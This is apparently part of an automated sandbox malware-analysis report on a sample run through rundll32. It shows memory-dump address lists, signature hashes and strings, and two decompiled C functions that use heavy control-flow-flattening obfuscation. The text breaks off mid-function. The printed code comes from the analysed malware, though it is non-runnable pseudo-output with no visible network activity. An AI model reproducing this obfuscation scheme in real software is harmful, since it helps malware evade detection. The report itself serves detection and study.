                                                                      0x01ff2cb4
                                                                      0x01ff2b0d
                                                                      0x01ff2b19
                                                                      0x01ff2daf
                                                                      0x01ff2db2
                                                                      0x01ff2db7
                                                                      0x01ff2db9
                                                                      0x00000000
                                                                      0x01ff2db9
                                                                      0x01ff2b21
                                                                      0x01ff2bc8
                                                                      0x01ff2bc9
                                                                      0x01ff2bf0
                                                                      0x01ff2bf5
                                                                      0x01ff2bf8
                                                                      0x01ff2bfa
                                                                      0x01ff2c1c
                                                                      0x01ff2c3e
                                                                      0x01ff2c43
                                                                      0x01ff2c43
                                                                      0x01ff2c46
                                                                      0x01ff2c4d
                                                                      0x01ff2c51
                                                                      0x01ff2c55
                                                                      0x01ff2c59
                                                                      0x00000000
                                                                      0x01ff2b27
                                                                      0x01ff2b27
                                                                      0x01ff2b2d
                                                                      0x00000000
                                                                      0x01ff2b33
                                                                      0x01ff2b33
                                                                      0x01ff2b35
                                                                      0x01ff2b37
                                                                      0x01ff2b42
                                                                      0x01ff2b49
                                                                      0x01ff2b4d
                                                                      0x01ff2b54
                                                                      0x01ff2b5b
                                                                      0x01ff2b63
                                                                      0x01ff2b64
                                                                      0x01ff2b69
                                                                      0x01ff2b6e
                                                                      0x01ff2b8d
                                                                      0x01ff2b92
                                                                      0x01ff2b95
                                                                      0x01ff2b9c
                                                                      0x01ff2ba0
                                                                      0x01ff2ba4
                                                                      0x01ff2bab
                                                                      0x01ff2baf
                                                                      0x01ff2baf
                                                                      0x01ff2bb4
                                                                      0x01ff2bb4
                                                                      0x01ff2bb7
                                                                      0x01ff2aeb
                                                                      0x01ff2aeb
                                                                      0x01ff2aeb
                                                                      0x00000000
                                                                      0x01ff2aeb
                                                                      0x01ff2aeb
                                                                      0x01ff2b2d
                                                                      0x00000000
                                                                      0x01ff2b21
                                                                      0x01ff2c6d
                                                                      0x01ff2c70
                                                                      0x01ff2c71
                                                                      0x01ff2c76
                                                                      0x01ff2c79
                                                                      0x01ff2c7b
                                                                      0x01ff2c81
                                                                      0x00000000
                                                                      0x01ff2c81
                                                                      0x00000000
                                                                      0x01ff2da1
                                                                      0x01ff2da1
                                                                      0x01ff2da1
                                                                      0x00000000
                                                                      0x01ff2af5
                                                                      0x01ff2af0

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !x$#t$$,$4RO'$:S$Gawr$Vy$2$Vy$2$f4$s$u$2$@
                                                                      • API String ID: 0-1200869751
                                                                      • Opcode ID: d203c129e0a52e4d6abee3b69769fa3786be56ad036ec8c3a973cbfcde8927ff
                                                                      • Instruction ID: d9da8d0c34533fecded6b6db702f30fd96d579a24771f076fd35e6938bf3e0f5
                                                                      • Opcode Fuzzy Hash: d203c129e0a52e4d6abee3b69769fa3786be56ad036ec8c3a973cbfcde8927ff
                                                                      • Instruction Fuzzy Hash: 3B32F372908381DFE368CF25C585A9BBBE2BFC4344F10891DE699962A0D7B58949CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !x$#t$$,$4RO'$:S$Gawr$Vy$2$Vy$2$f4$s$u$2$@
                                                                      • API String ID: 0-1200869751
                                                                      • Opcode ID: 113ba5cbdea58830c0e016ea2be18b6fe50078e30343529e1375b1d1c372b620
                                                                      • Instruction ID: 0e2194ec2e3f4c3580be536eb47724fa45bb1ba03d21a2c9d8c0381fa4a5a795
                                                                      • Opcode Fuzzy Hash: 113ba5cbdea58830c0e016ea2be18b6fe50078e30343529e1375b1d1c372b620
                                                                      • Instruction Fuzzy Hash: 4D3224B1508381DFE368CF25C589A8BFBE2BBC4304F10891DE6D9962A1D7B58959CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 97%
                                                                      			E01FFCAA3(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				char _v4;
                                                                      				char _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v16;
                                                                      				intOrPtr _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				intOrPtr _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				signed int _v116;
                                                                      				signed int _v120;
                                                                      				signed int _v124;
                                                                      				unsigned int _v128;
                                                                      				signed int _v132;
                                                                      				signed int _v136;
                                                                      				signed int _v140;
                                                                      				signed int _v144;
                                                                      				signed int _v148;
                                                                      				signed int _v152;
                                                                      				signed int _v156;
                                                                      				signed int _v160;
                                                                      				signed int _v164;
                                                                      				signed int _v168;
                                                                      				void* __ecx;
                                                                      				intOrPtr _t372;
                                                                      				void* _t379;
                                                                      				signed int _t381;
                                                                      				intOrPtr _t385;
                                                                      				intOrPtr _t393;
                                                                      				signed int _t395;
                                                                      				signed int _t396;
                                                                      				signed int _t397;
                                                                      				signed int _t398;
                                                                      				signed int _t399;
                                                                      				signed int _t400;
                                                                      				signed int _t401;
                                                                      				void* _t402;
                                                                      				void* _t428;
                                                                      				intOrPtr* _t437;
                                                                      				void* _t440;
                                                                      				intOrPtr _t444;
                                                                      				signed int* _t446;
                                                                      				void* _t448;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_v12 = __edx;
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				E02002550(__edx);
                                                                      				_v164 = 0xccf8;
                                                                      				_t446 =  &(( &_v168)[5]);
                                                                      				_t444 = 0;
                                                                      				_t440 = 0x5b8b322;
                                                                      				_t393 = 0;
                                                                      				_t395 = 0x39;
                                                                      				_v164 = _v164 * 0x47;
                                                                      				_v164 = _v164 * 0x3b;
                                                                      				_v164 = _v164 + 0xffffb5ce;
                                                                      				_v164 = _v164 ^ 0x0d199a53;
                                                                      				_v48 = 0x6ac5;
                                                                      				_v48 = _v48 ^ 0x000067e6;
                                                                      				_v120 = 0xab9;
                                                                      				_v120 = _v120 + 0xffffc5bb;
                                                                      				_v120 = _v120 >> 0xb;
                                                                      				_v120 = _v120 * 0x34;
                                                                      				_v120 = _v120 ^ 0x067fd26a;
                                                                      				_v64 = 0x3f6b;
                                                                      				_v64 = _v64 | 0x8301b69e;
                                                                      				_v64 = _v64 ^ 0xf453b1d5;
                                                                      				_v64 = _v64 ^ 0x7752766c;
                                                                      				_v136 = 0x6672;
                                                                      				_v136 = _v136 / _t395;
                                                                      				_v136 = _v136 >> 2;
                                                                      				_v136 = _v136 + 0x3c5d;
                                                                      				_v136 = _v136 ^ 0x00000609;
                                                                      				_v72 = 0x83af;
                                                                      				_v72 = _v72 + 0xffff692b;
                                                                      				_v72 = _v72 << 0xe;
                                                                      				_v72 = _v72 ^ 0xfb36aaa0;
                                                                      				_v144 = 0x1094;
                                                                      				_v144 = _v144 << 3;
                                                                      				_v144 = _v144 >> 1;
                                                                      				_v144 = _v144 << 2;
                                                                      				_v144 = _v144 ^ 0x000104fb;
                                                                      				_v52 = 0xbbd9;
                                                                      				_v52 = _v52 >> 0xa;
                                                                      				_v52 = _v52 ^ 0x000007b3;
                                                                      				_v56 = 0xb390;
                                                                      				_v56 = _v56 | 0xd4330ee7;
                                                                      				_v56 = _v56 ^ 0xd433f5ab;
                                                                      				_v80 = 0x1d14;
                                                                      				_v80 = _v80 ^ 0xe2529727;
                                                                      				_v80 = _v80 << 0xb;
                                                                      				_v80 = _v80 ^ 0x94518475;
                                                                      				_v152 = 0x78c0;
                                                                      				_v152 = _v152 + 0xffffa07a;
                                                                      				_v152 = _v152 | 0x12864170;
                                                                      				_v152 = _v152 + 0xffff96fb;
                                                                      				_v152 = _v152 ^ 0x12858604;
                                                                      				_v88 = 0x362c;
                                                                      				_v88 = _v88 + 0x273d;
                                                                      				_v88 = _v88 | 0x7b30ce6c;
                                                                      				_v88 = _v88 ^ 0x7b308180;
                                                                      				_v160 = 0x1107;
                                                                      				_t396 = 0xd;
                                                                      				_v160 = _v160 / _t396;
                                                                      				_v160 = _v160 + 0xaf20;
                                                                      				_v160 = _v160 << 0xe;
                                                                      				_v160 = _v160 ^ 0x2c1bf631;
                                                                      				_v28 = 0x16fd;
                                                                      				_v28 = _v28 ^ 0xc6d3337a;
                                                                      				_v28 = _v28 ^ 0xc6d3649c;
                                                                      				_v128 = 0xb310;
                                                                      				_v128 = _v128 + 0x60af;
                                                                      				_t397 = 0x11;
                                                                      				_v128 = _v128 * 0x17;
                                                                      				_v128 = _v128 >> 0x10;
                                                                      				_v128 = _v128 ^ 0x00003f03;
                                                                      				_v108 = 0x969;
                                                                      				_v108 = _v108 + 0x5b76;
                                                                      				_v108 = _v108 | 0x469c96ef;
                                                                      				_v108 = _v108 + 0xd995;
                                                                      				_v108 = _v108 ^ 0x469dfd2d;
                                                                      				_v24 = 0xa535;
                                                                      				_v24 = _v24 << 9;
                                                                      				_v24 = _v24 ^ 0x014a08df;
                                                                      				_v116 = 0x2d09;
                                                                      				_v116 = _v116 / _t397;
                                                                      				_v116 = _v116 << 0xf;
                                                                      				_t398 = 0x5a;
                                                                      				_v116 = _v116 * 0x1d;
                                                                      				_v116 = _v116 ^ 0x266728a5;
                                                                      				_v156 = 0xc20b;
                                                                      				_v156 = _v156 + 0xffff4ceb;
                                                                      				_v156 = _v156 + 0x3710;
                                                                      				_v156 = _v156 >> 6;
                                                                      				_v156 = _v156 ^ 0x000023ae;
                                                                      				_v60 = 0x9b8;
                                                                      				_v60 = _v60 + 0xbf87;
                                                                      				_v60 = _v60 ^ 0x000089a9;
                                                                      				_v132 = 0x3af8;
                                                                      				_v132 = _v132 / _t398;
                                                                      				_v132 = _v132 ^ 0xca87d414;
                                                                      				_v132 = _v132 + 0xffff6282;
                                                                      				_v132 = _v132 ^ 0xca8759f3;
                                                                      				_v92 = 0x2786;
                                                                      				_v92 = _v92 + 0x26b3;
                                                                      				_v92 = _v92 | 0x1d28531e;
                                                                      				_v92 = _v92 ^ 0x1d28279a;
                                                                      				_v140 = 0x492b;
                                                                      				_v140 = _v140 + 0xffff62ea;
                                                                      				_v140 = _v140 >> 0xe;
                                                                      				_v140 = _v140 << 3;
                                                                      				_v140 = _v140 ^ 0x001f936e;
                                                                      				_v40 = 0x294b;
                                                                      				_v40 = _v40 | 0x90a98536;
                                                                      				_v40 = _v40 ^ 0x90a99c6f;
                                                                      				_v124 = 0x1400;
                                                                      				_v124 = _v124 << 0xf;
                                                                      				_v124 = _v124 + 0xffffb6e1;
                                                                      				_v124 = _v124 >> 0xa;
                                                                      				_v124 = _v124 ^ 0x00026da1;
                                                                      				_v148 = 0x1dcc;
                                                                      				_v148 = _v148 + 0xffff7172;
                                                                      				_v148 = _v148 ^ 0x59a54da9;
                                                                      				_t399 = 0x3a;
                                                                      				_v148 = _v148 / _t399;
                                                                      				_v148 = _v148 ^ 0x02de527e;
                                                                      				_v96 = 0xc2c0;
                                                                      				_t400 = 0x59;
                                                                      				_v96 = _v96 / _t400;
                                                                      				_v96 = _v96 | 0x601f9634;
                                                                      				_v96 = _v96 ^ 0x601fa5fc;
                                                                      				_v68 = 0x5993;
                                                                      				_v68 = _v68 + 0x3c37;
                                                                      				_t401 = 0x27;
                                                                      				_v68 = _v68 * 0x42;
                                                                      				_v68 = _v68 ^ 0x00269f78;
                                                                      				_v100 = 0x35d8;
                                                                      				_v100 = _v100 + 0xf370;
                                                                      				_v100 = _v100 + 0x85ef;
                                                                      				_v100 = _v100 ^ 0x0001fecf;
                                                                      				_v36 = 0x96a8;
                                                                      				_v36 = _v36 << 4;
                                                                      				_v36 = _v36 ^ 0x00096afa;
                                                                      				_v84 = 0x6657;
                                                                      				_v84 = _v84 / _t401;
                                                                      				_v84 = _v84 + 0x88b2;
                                                                      				_v84 = _v84 ^ 0x0000efd0;
                                                                      				_v44 = 0x5846;
                                                                      				_v44 = _v44 ^ 0xc187cff1;
                                                                      				_v44 = _v44 ^ 0xc187ccd9;
                                                                      				_v112 = 0x4c1b;
                                                                      				_v112 = _v112 + 0xffffc101;
                                                                      				_v112 = _v112 ^ 0x97fe48a5;
                                                                      				_v112 = _v112 + 0xffff20cb;
                                                                      				_v112 = _v112 ^ 0x97fd2571;
                                                                      				_v32 = 0x3b02;
                                                                      				_v32 = _v32 >> 3;
                                                                      				_v32 = _v32 ^ 0x00000761;
                                                                      				_v168 = 0x7902;
                                                                      				_v168 = _v168 >> 0x10;
                                                                      				_v168 = _v168 >> 9;
                                                                      				_v168 = _v168 ^ 0x00000001;
                                                                      				_v76 = 0x42c9;
                                                                      				_v76 = _v76 >> 0xc;
                                                                      				_v76 = _v76 ^ 0xe5acdda9;
                                                                      				_v76 = _v76 ^ 0xe5acddac;
                                                                      				_t437 = _v16;
                                                                      				while(1) {
                                                                      					L1:
                                                                      					_t372 = _v104;
                                                                      					while(1) {
                                                                      						L2:
                                                                      						_t428 = 0x137be7af;
                                                                      						while(1) {
                                                                      							L3:
                                                                      							_t402 = 0x1f61ce4d;
                                                                      							while(1) {
                                                                      								L4:
                                                                      								_t448 = _t440 - _t402;
                                                                      								if(_t448 > 0) {
                                                                      									goto L19;
                                                                      								}
                                                                      								L5:
                                                                      								if(_t448 == 0) {
                                                                      									E01FFE48F(_v96, _v168, _v12, _v68, _v100, _t444);
                                                                      									_t446 =  &(_t446[4]);
                                                                      									L18:
                                                                      									_t440 = 0x1e16564f;
                                                                      									while(1) {
                                                                      										L1:
                                                                      										_t372 = _v104;
                                                                      										goto L2;
                                                                      									}
                                                                      								} else {
                                                                      									if(_t440 == 0x5b8b322) {
                                                                      										_t440 = 0x1e3d7d53;
                                                                      										continue;
                                                                      									} else {
                                                                      										if(_t440 == 0x6fb8319) {
                                                                      											_t385 = E02000321(_a4, _v76, _v108, _v24,  *_t437);
                                                                      											_t446 =  &(_t446[3]);
                                                                      											_v20 = _t385;
                                                                      											_t372 = _v104;
                                                                      											_t428 = 0x137be7af;
                                                                      											_t440 =  !=  ? 0x137be7af : 0x2332be2e;
                                                                      											goto L3;
                                                                      										} else {
                                                                      											if(_t440 == _t428) {
                                                                      												E020007A6(_t444, _v116, _v20,  &_v8, _v32, _t402, _v156, _v60, _v132, _v92);
                                                                      												_t440 =  !=  ? 0x1f61ce4d : 0x2332be2e;
                                                                      												_t372 = E01FF5AB8(_v140, _v40, _v124, _v148, _v20);
                                                                      												_t446 =  &(_t446[0xb]);
                                                                      												_t402 = 0x1f61ce4d;
                                                                      												_t428 = 0x137be7af;
                                                                      												goto L31;
                                                                      											} else {
                                                                      												if(_t440 == 0x1e16564f) {
                                                                      													E01FFDE81(_v36, _t444, _v84);
                                                                      													_t440 = 0x35ec3230;
                                                                      													while(1) {
                                                                      														L1:
                                                                      														_t372 = _v104;
                                                                      														goto L2;
                                                                      													}
                                                                      												} else {
                                                                      													if(_t440 != 0x1e3d7d53) {
                                                                      														L31:
                                                                      														if(_t440 != 0x2c302295) {
                                                                      															_t372 = _v104;
                                                                      															continue;
                                                                      														}
                                                                      													} else {
                                                                      														_push(_t402);
                                                                      														_t372 = E01FF54FB(0x20000);
                                                                      														_t393 = _t372;
                                                                      														if(_t393 != 0) {
                                                                      															_t440 = 0x26c6e589;
                                                                      															while(1) {
                                                                      																L1:
                                                                      																_t372 = _v104;
                                                                      																L2:
                                                                      																_t428 = 0x137be7af;
                                                                      																L3:
                                                                      																_t402 = 0x1f61ce4d;
                                                                      																while(1) {
                                                                      																	L4:
                                                                      																	_t448 = _t440 - _t402;
                                                                      																	if(_t448 > 0) {
                                                                      																		goto L19;
                                                                      																	}
                                                                      																	goto L5;
                                                                      																}
                                                                      																goto L19;
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								L24:
                                                                      								return _t372;
                                                                      								L33:
                                                                      								L19:
                                                                      								if(_t440 == 0x2332be2e) {
                                                                      									_t437 = _t437 + 0x2c;
                                                                      									if(_t437 >= _t372) {
                                                                      										_t440 = 0x1e16564f;
                                                                      										goto L31;
                                                                      									} else {
                                                                      										_t440 = 0x6fb8319;
                                                                      										continue;
                                                                      									}
                                                                      								} else {
                                                                      									if(_t440 == 0x26c6e589) {
                                                                      										_push(_t402);
                                                                      										_t444 = E01FF54FB(0x2000);
                                                                      										_t440 =  !=  ? 0x2b10f021 : 0x35ec3230;
                                                                      										goto L1;
                                                                      									} else {
                                                                      										_t372 = 0x2b10f021;
                                                                      										if(_t440 == 0x2b10f021) {
                                                                      											_t379 = E01FFEBC8(_t402, _t428, _v136, _t402, _v72, _t402, _t402,  &_v4, _v144, _t402, _v52, _t393, _v56, _v80, _v152,  &_v16, _v88, _v160, _v28, _a4);
                                                                      											_t446 =  &(_t446[0x12]);
                                                                      											if(_t379 == 0) {
                                                                      												goto L18;
                                                                      											} else {
                                                                      												_t381 = E01FFA156();
                                                                      												_t440 = 0x6fb8319;
                                                                      												_t372 = _v16 * 0x2c + _t393;
                                                                      												_v104 = _t372;
                                                                      												_t437 =  >=  ? _t393 : (_t381 & 0x0000001f) * 0x2c + _t393;
                                                                      												goto L2;
                                                                      											}
                                                                      											goto L33;
                                                                      										} else {
                                                                      											if(_t440 == 0x35ec3230) {
                                                                      												return E01FFDE81(_v44, _t393, _v112);
                                                                      											}
                                                                      											goto L31;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								goto L24;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}


                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -$+I$025$025$025$7<$FX$K)$RESCDIR$Wf$]<$lvRw$v[
                                                                      • API String ID: 0-3541609021
                                                                      • Opcode ID: c0770792cf82ae2b9e4ac636a34dcb648dc708d056a1601b2e7f761c4e2546bd
                                                                      • Instruction ID: 21fb2faff7e0b75154ef0bf57ae101749b3859b981cfddf8315926af69df715b
                                                                      • Opcode Fuzzy Hash: c0770792cf82ae2b9e4ac636a34dcb648dc708d056a1601b2e7f761c4e2546bd
                                                                      • Instruction Fuzzy Hash: 701235725083819FE364CF69C989A4BFBE1BBC4758F10891DF2D996260C7B68949CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -$+I$025$025$025$7<$FX$K)$RESCDIR$Wf$]<$lvRw$v[
                                                                      • API String ID: 0-3541609021
                                                                      • Opcode ID: 4fd5ab3d9a626b7ad5c676ebc6d3fe79e98380c16587f6164649b078393db6c6
                                                                      • Instruction ID: 2475ef4464c64854fd8201d03c48903bacdb1b09309280780212bf6200665734
                                                                      • Opcode Fuzzy Hash: 4fd5ab3d9a626b7ad5c676ebc6d3fe79e98380c16587f6164649b078393db6c6
                                                                      • Instruction Fuzzy Hash: ED1265B25183819FE368CF25C98AA4BFBE1BBC4748F10891CF5D996260C7B58958CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E0200BBF1(intOrPtr __ecx, void* __edx) {
                                                                      				signed int _v4;
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				unsigned int _v36;
                                                                      				unsigned int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				intOrPtr* _t270;
                                                                      				void* _t271;
                                                                      				intOrPtr* _t272;
                                                                      				intOrPtr* _t275;
                                                                      				intOrPtr _t276;
                                                                      				intOrPtr _t278;
                                                                      				signed int _t280;
                                                                      				signed int _t281;
                                                                      				signed int _t282;
                                                                      				signed int _t283;
                                                                      				signed int _t284;
                                                                      				signed int _t285;
                                                                      				signed int _t286;
                                                                      				signed int _t287;
                                                                      				signed int _t288;
                                                                      				void* _t289;
                                                                      				void* _t318;
                                                                      				intOrPtr* _t326;
                                                                      				void* _t327;
                                                                      				void* _t330;
                                                                      				signed int* _t331;
                                                                      
                                                                      				_t331 =  &_v96;
                                                                      				_v36 = 0x7971;
                                                                      				_v36 = _v36 >> 4;
                                                                      				_v36 = _v36 >> 3;
                                                                      				_v36 = _v36 ^ 0x0000182f;
                                                                      				_v40 = 0xfd3e;
                                                                      				_v40 = _v40 ^ 0x584e228f;
                                                                      				_v40 = _v40 >> 0xf;
                                                                      				_v40 = _v40 ^ 0x0000cb4e;
                                                                      				_v60 = 0xc7d1;
                                                                      				_v60 = _v60 * 0x1a;
                                                                      				_t330 = __edx;
                                                                      				_v60 = _v60 ^ 0xe7356e21;
                                                                      				_v60 = _v60 ^ 0xe721078e;
                                                                      				_t278 = __ecx;
                                                                      				_v12 = 0x8b7c;
                                                                      				_t326 = 0;
                                                                      				_t327 = 0xc32a3cb;
                                                                      				_t280 = 0x76;
                                                                      				_v12 = _v12 / _t280;
                                                                      				_v12 = _v12 ^ 0x0000029d;
                                                                      				_v64 = 0x73a3;
                                                                      				_v64 = _v64 | 0x4efcdde2;
                                                                      				_v64 = _v64 ^ 0xed66e3eb;
                                                                      				_v64 = _v64 ^ 0xa39a41bb;
                                                                      				_v16 = 0x4227;
                                                                      				_t281 = 0x6d;
                                                                      				_v16 = _v16 / _t281;
                                                                      				_v16 = _v16 ^ 0x00001ea2;
                                                                      				_v72 = 0x8c44;
                                                                      				_v72 = _v72 << 1;
                                                                      				_v72 = _v72 >> 9;
                                                                      				_v72 = _v72 + 0xffffe8d2;
                                                                      				_v72 = _v72 ^ 0xffffd00c;
                                                                      				_v52 = 0xbd45;
                                                                      				_v52 = _v52 | 0x9852b62d;
                                                                      				_v52 = _v52 ^ 0xe9b55024;
                                                                      				_v52 = _v52 ^ 0x71e7e0db;
                                                                      				_v56 = 0x6ad6;
                                                                      				_v56 = _v56 | 0xcbfebfcb;
                                                                      				_t282 = 0x29;
                                                                      				_v56 = _v56 / _t282;
                                                                      				_v56 = _v56 ^ 0x04f9ee03;
                                                                      				_v76 = 0x6ec;
                                                                      				_v76 = _v76 + 0xffffce11;
                                                                      				_v76 = _v76 + 0xffff084a;
                                                                      				_v76 = _v76 + 0xffff2b6a;
                                                                      				_v76 = _v76 ^ 0xfffe3623;
                                                                      				_v44 = 0x29d6;
                                                                      				_v44 = _v44 << 1;
                                                                      				_t283 = 0x5a;
                                                                      				_v44 = _v44 / _t283;
                                                                      				_v44 = _v44 ^ 0x00000afa;
                                                                      				_v48 = 0xe792;
                                                                      				_v48 = _v48 + 0x94ab;
                                                                      				_t284 = 0x2e;
                                                                      				_v48 = _v48 / _t284;
                                                                      				_v48 = _v48 ^ 0x000072c7;
                                                                      				_v4 = 0xd512;
                                                                      				_v4 = _v4 + 0xffff3306;
                                                                      				_v4 = _v4 ^ 0x00006e5d;
                                                                      				_v8 = 0x264b;
                                                                      				_v8 = _v8 + 0xffff8ff4;
                                                                      				_v8 = _v8 ^ 0xffff8e36;
                                                                      				_v80 = 0x7210;
                                                                      				_v80 = _v80 ^ 0x6afff0fe;
                                                                      				_t285 = 0x11;
                                                                      				_v80 = _v80 / _t285;
                                                                      				_v80 = _v80 << 6;
                                                                      				_v80 = _v80 ^ 0x92d08612;
                                                                      				_v84 = 0x33aa;
                                                                      				_v84 = _v84 ^ 0x3f3ff109;
                                                                      				_v84 = _v84 + 0xffff35d7;
                                                                      				_t286 = 0x2f;
                                                                      				_v84 = _v84 / _t286;
                                                                      				_v84 = _v84 ^ 0x015805a3;
                                                                      				_v88 = 0x96ab;
                                                                      				_t287 = 0x47;
                                                                      				_v88 = _v88 * 0x24;
                                                                      				_v88 = _v88 * 0x4e;
                                                                      				_v88 = _v88 << 7;
                                                                      				_v88 = _v88 ^ 0x3a51b47d;
                                                                      				_v92 = 0x8813;
                                                                      				_v92 = _v92 | 0x160d8541;
                                                                      				_v92 = _v92 + 0xffff816c;
                                                                      				_v92 = _v92 * 0xf;
                                                                      				_v92 = _v92 ^ 0x4ac3c30b;
                                                                      				_v68 = 0x7d5a;
                                                                      				_v68 = _v68 + 0xa00e;
                                                                      				_v68 = _v68 ^ 0xd0cc0e09;
                                                                      				_v68 = _v68 ^ 0xd0cd7390;
                                                                      				_v20 = 0x6856;
                                                                      				_v20 = _v20 | 0xcedc98a4;
                                                                      				_v20 = _v20 ^ 0xcedcfbdf;
                                                                      				_v24 = 0xae99;
                                                                      				_v24 = _v24 >> 8;
                                                                      				_v24 = _v24 ^ 0x0000275a;
                                                                      				_v96 = 0xb43a;
                                                                      				_v96 = _v96 * 0x19;
                                                                      				_v96 = _v96 / _t287;
                                                                      				_t288 = 3;
                                                                      				_v96 = _v96 * 0x17;
                                                                      				_v96 = _v96 ^ 0x0005aff4;
                                                                      				_v28 = 0x55f9;
                                                                      				_v28 = _v28 >> 1;
                                                                      				_v28 = _v28 + 0x6ee3;
                                                                      				_v28 = _v28 ^ 0x0000aff9;
                                                                      				_v32 = 0x362c;
                                                                      				_v32 = _v32 / _t288;
                                                                      				_v32 = _v32 << 5;
                                                                      				_v32 = _v32 ^ 0x00022d08;
                                                                      				while(1) {
                                                                      					L1:
                                                                      					while(1) {
                                                                      						L2:
                                                                      						_t289 = 0x23245655;
                                                                      						do {
                                                                      							L3:
                                                                      							while(_t327 != 0xc32a3cb) {
                                                                      								if(_t327 == 0xd077af0) {
                                                                      									return E01FFDE81(_v28, _t326, _v32);
                                                                      								}
                                                                      								if(_t327 == 0xf6ecb09) {
                                                                      									_t270 = E01FF3B5C( *((intOrPtr*)(_t326 + 8)), _v4, _v8);
                                                                      									_t331 =  &(_t331[1]);
                                                                      									 *((intOrPtr*)(_t326 + 0x18)) = _t270;
                                                                      									__eflags = _t270;
                                                                      									_t289 = 0x23245655;
                                                                      									_t271 = 0x24e45cbd;
                                                                      									_t327 =  !=  ? 0x23245655 : 0x31f83ea5;
                                                                      									continue;
                                                                      								}
                                                                      								if(_t327 == 0x20f8708a) {
                                                                      									_push(_t289);
                                                                      									_t272 = E01FF5B7D(_v60, _t330, __eflags, _v12, _v64, _v16);
                                                                      									_t331 =  &(_t331[4]);
                                                                      									 *((intOrPtr*)(_t326 + 8)) = _t272;
                                                                      									__eflags = _t272;
                                                                      									if(__eflags == 0) {
                                                                      										L11:
                                                                      										_t327 = 0xd077af0;
                                                                      										while(1) {
                                                                      											L1:
                                                                      											L2:
                                                                      											_t289 = 0x23245655;
                                                                      											goto L3;
                                                                      										}
                                                                      									}
                                                                      									E01FF5696(_v72,  *((intOrPtr*)(_t326 + 8)), _v52, _v56,  *((intOrPtr*)(_t326 + 8)), _v76);
                                                                      									_push(_v48);
                                                                      									E02001A48( *((intOrPtr*)(_t326 + 8)));
                                                                      									_t331 =  &(_t331[5]);
                                                                      									_t327 = 0xf6ecb09;
                                                                      									while(1) {
                                                                      										L1:
                                                                      										goto L2;
                                                                      									}
                                                                      								}
                                                                      								if(_t327 == _t289) {
                                                                      									_push(E01FFF369);
                                                                      									_push(_v92);
                                                                      									_push(_t289);
                                                                      									_push(_v88);
                                                                      									_push(_v84);
                                                                      									_t275 = E01FF903E(_t326, _v80);
                                                                      									_t331 = _t331 - 0xc + 0x20;
                                                                      									 *((intOrPtr*)(_t326 + 0x28)) = _t275;
                                                                      									__eflags = _t275;
                                                                      									_t271 = 0x24e45cbd;
                                                                      									_t327 =  !=  ? 0x24e45cbd : 0x31f83ea5;
                                                                      									goto L2;
                                                                      								}
                                                                      								if(_t327 == _t271) {
                                                                      									 *((intOrPtr*)(_t326 + 0x44)) = _t278;
